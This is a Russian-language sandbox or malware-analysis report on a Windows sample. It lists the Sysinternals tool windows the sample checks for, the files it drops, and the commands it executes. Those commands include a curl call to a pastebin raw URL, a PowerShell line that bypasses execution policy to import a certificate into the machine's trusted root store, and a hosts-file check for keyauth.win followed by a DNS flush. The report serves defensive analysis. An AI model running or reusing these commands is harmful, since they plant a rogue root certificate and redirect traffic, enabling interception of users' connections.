Техническая информация
- ClassName: 'FilemonClass', WindowName: ''
- ClassName: '', WindowName: 'File Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'PROCMON_WINDOW_CLASS', WindowName: ''
- ClassName: '', WindowName: 'Process Monitor - Sysinternals: www.sysinternals.com'
- ClassName: 'RegmonClass', WindowName: ''
- %TEMP%\aut1cb4.tmp
- %TEMP%\rust.exe
- %TEMP%\aut1e3b.tmp
- %HOMEPATH%\appdata\hosts.bat
- nul
- %TEMP%\aut1cb4.tmp
- %TEMP%\aut1e3b.tmp
- %HOMEPATH%\appdata\hosts.bat
- %TEMP%\rust.exe в <Текущая директория>\drtajmntzzw3i21k .exe
- ClassName: 'Registry Monitor - Sysinternals: www.sysinternals.com', WindowName: ''
- ClassName: '18467-41', WindowName: ''
- '%TEMP%\rust.exe'
- '%WINDIR%\syswow64\cmd.exe' /c %HOMEPATH%\AppData\hosts.bat' (со скрытым окном)
- '%WINDIR%\syswow64\cmd.exe' /c %HOMEPATH%\AppData\hosts.bat
- '%WINDIR%\syswow64\cmd.exe' /c curl -s https://pastebin.com/raw/sD69ivJ5
- '%WINDIR%\syswow64\cmd.exe' /S /D /c" echo "
- '%WINDIR%\syswow64\findstr.exe' /R "^[0-9]*\.[0-9]*\.[0-9]*\.[0-9]*$"
- '%WINDIR%\syswow64\certutil.exe' -store TrustedRoot
- '%WINDIR%\syswow64\findstr.exe' /i /c:"%HOMEPATH%\AppData\server.crt"
- '%WINDIR%\syswow64\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Import-Certificate -FilePath '%HOMEPATH%\AppData\server.crt' -CertStoreLocation 'Cert:\LocalMachine\Root' -ErrorAction SilentlyContinue"
- '%WINDIR%\syswow64\findstr.exe' /C:" keyauth.win" "<DRIVERS>\etc\hosts"
- '%WINDIR%\syswow64\ipconfig.exe' /flushdns